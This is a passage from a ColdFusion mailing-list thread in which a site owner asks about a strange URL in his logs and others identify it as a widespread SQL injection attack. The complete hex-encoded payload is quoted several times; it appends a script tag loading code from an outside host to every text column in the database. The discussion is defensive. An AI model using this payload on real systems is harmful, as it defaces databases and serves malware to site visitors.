@S=CAST(0x4445434C415245204054207661726368617228323535292C404320766172636861
72283430303029204445434C415245205461626C655F437572736F7220435552534F5220464F
522073656C65637420612E6E616D652C622E6E616D652066726F6D207379736F626A65637473
20612C737973636F6C756D6E73206220776865726520612E69643D622E696420616E6420612E
78747970653D27752720616E642028622E78747970653D3939206F7220622E78747970653D33
35206F7220622E78747970653D323331206F7220622E78747970653D31363729204F50454E20
5461626C655F437572736F72204645544348204E4558542046524F4D20205461626C655F4375
72736F7220494E544F2040542C4043205748494C4528404046455443485F5354415455533D30
2920424547494E20657865632827757064617465205B272B40542B275D20736574205B272B40
432B275D3D5B272B40432B275D2B2727223E3C2F7469746C653E3C736372697074207372633D
22687474703A2F2F312E766572796E782E636E2F772E6A73223E3C2F7363726970743E3C212D
2D272720776865726520272B40432B27206E6F74206C696B6520272725223E3C2F7469746C65
3E3C736372697074207372633D22687474703A2F2F312E766572796E782E636E2F772E6A7322
3E3C2F7363726970743E3C212D2D272727294645544348204E4558542046524F4D2020546162
6C655F437572736F7220494E544F2040542C404320454E4420434C4F5345205461626C655F43
7572736F72204445414C4C4F43415445205461626C655F437572736F72 AS
CHAR(4000));EXEC(@S);
>>Why bother looking around the internet? Use your SQL server to decode
it!
Huh... Learn sumptin new every day. That is why I keep coming back here. ;)
Thanx Brad.
~G~
Author: Gerald Guido
Short Link: http://www.houseoffusion.com/groups/cf-talk/thread.cfm/threadid:57065#309333
>>Why bother looking around the internet? Use your SQL server to decode
it!
Huh... Learn sumptin new every day. That is why I keep coming back here. ;)
Thanx Brad.
~G~
----- Excess quoted text cut - see Original Post for more -----
Author: Brad Wood
Short Link: http://www.houseoffusion.com/groups/cf-talk/thread.cfm/threadid:57065#309332
Why bother looking around the internet? Use your SQL server to decode
it!
Simply change the exec to a print statement. Very important! :)
~Brad
This is some sort of encoding... Like Bin Hex, Spammers use it to
obscure
urls and such. Computers read it just fine. If you look around on the
internets you can find a decoder to render it to human readable form.
You
just need to figure out what sort of encoding they are using
Author: Brad Wood
Short Link: http://www.houseoffusion.com/groups/cf-talk/thread.cfm/threadid:57065#309331
Read this:
http://www.coldfusionmuse.com/index.cfm/2008/7/18/Injection-Using-CAST-A
nd-ASCII
~Brad
Just was looking at a 'user monitor' page on one of my sites and I saw
the
url string below being called. I've seen several sql injection urls
before,
but what the heck are they trying to accomplish here? Eeverything is
cfqueryparam'ed. Thanks,
Che
Author: Gerald Guido
Short Link: http://www.houseoffusion.com/groups/cf-talk/thread.cfm/threadid:57065#309330
This is some sort of encoding... Like Bin Hex, Spammers use it to obscure
urls and such. Computers read it just fine. If you look around on the
internets you can find a decoder to render it to human readable form. You
just need to figure out what sort of encoding they are using
----- Excess quoted text cut - see Original Post for more -----
Author: Mark Kruger
Short Link: http://www.houseoffusion.com/groups/cf-talk/thread.cfm/threadid:57065#309329
This is a popular and very malicious SQL injection attack that is making the
rounds:
http://www.coldfusionmuse.com/index.cfm/2008/7/18/Injection-Using-CAST-And-A
SCII
-Mark
Mark A. Kruger, CFG, MCSE
(402) 408-3733 ext 105
www.cfwebtools.com
www.coldfusionmuse.com
www.necfug.com
Just was looking at a 'user monitor' page on one of my sites and I saw the
url string below being called. I've seen several sql injection urls before,
but what the heck are they trying to accomplish here? Eeverything is
cfqueryparam'ed. Thanks, Che
/rss.cfm?';DECLARE @S CHAR(4000);SET
@S=CAST(0x4445434C415245204054207661726368617228323535292C404320766172636861
72283430303029204445434C415245205461626C655F437572736F7220435552534F5220464F
522073656C65637420612E6E616D652C622E6E616D652066726F6D207379736F626A65637473
20612C737973636F6C756D6E73206220776865726520612E69643D622E696420616E6420612E
78747970653D27752720616E642028622E78747970653D3939206F7220622E78747970653D33
35206F7220622E78747970653D323331206F7220622E78747970653D31363729204F50454E20
5461626C655F437572736F72204645544348204E4558542046524F4D20205461626C655F4375
72736F7220494E544F2040542C4043205748494C4528404046455443485F5354415455533D30
2920424547494E20657865632827757064617465205B272B40542B275D20736574205B272B40
432B275D3D5B272B40432B275D2B2727223E3C2F7469746C653E3C736372697074207372633D
22687474703A2F2F312E766572796E782E636E2F772E6A73223E3C2F7363726970743E3C212D
2D272720776865726520272B40432B27206E6F74206C696B6520272725223E3C2F7469746C65
3E3C736372697074207372633D22687474703A2F2F312E766572796E782E636E2F772E6A7322
3E3C2F7363726970743E3C212D2D272727294645544348204E4558542046524F4D2020546162
6C655F437572736F7220494E544F2040542C404320454E4420434C4F5345205461626C655F43
7572736F72204445414C4C4F43415445205461626C655F437572736F72 AS
CHAR(4000));EXEC(@S);
Author: Che Vilnonis
Short Link: http://www.houseoffusion.com/groups/cf-talk/thread.cfm/threadid:57065#309328
Just was looking at a 'user monitor' page on one of my sites and I saw the
url string below being called. I've seen several sql injection urls before,
but what the heck are they trying to accomplish here? Eeverything is
cfqueryparam'ed. Thanks, Che
/rss.cfm?';DECLARE @S CHAR(4000);SET
@S=CAST(0x4445434C415245204054207661726368617228323535292C404320766172636861
72283430303029204445434C415245205461626C655F437572736F7220435552534F5220464F
522073656C65637420612E6E616D652C622E6E616D652066726F6D207379736F626A65637473
20612C737973636F6C756D6E73206220776865726520612E69643D622E696420616E6420612E
78747970653D27752720616E642028622E78747970653D3939206F7220622E78747970653D33
35206F7220622E78747970653D323331206F7220622E78747970653D31363729204F50454E20
5461626C655F437572736F72204645544348204E4558542046524F4D20205461626C655F4375
72736F7220494E544F2040542C4043205748494C4528404046455443485F5354415455533D30
2920424547494E20657865632827757064617465205B272B40542B275D20736574205B272B40
432B275D3D5B272B40432B275D2B2727223E3C2F7469746C653E3C736372697074207372633D
22687474703A2F2F312E766572796E782E636E2F772E6A73223E3C2F7363726970743E3C212D
2D272720776865726520272B40432B27206E6F74206C696B6520272725223E3C2F7469746C65
3E3C736372697074207372633D22687474703A2F2F312E766572796E782E636E2F772E6A7322
3E3C2F7363726970743E3C212D2D272727294645544348204E4558542046524F4D2020546162
6C655F437572736F7220494E544F2040542C404320454E4420434C4F5345205461626C655F43
7572736F72204445414C4C4F43415445205461626C655F437572736F72 AS
CHAR(4000));EXEC(@S);
|
May 24, 2012
|
Latest Fusion Authority Articles
|
|||||||||||||||||||||||||||||||||||||||||||||||||||||||
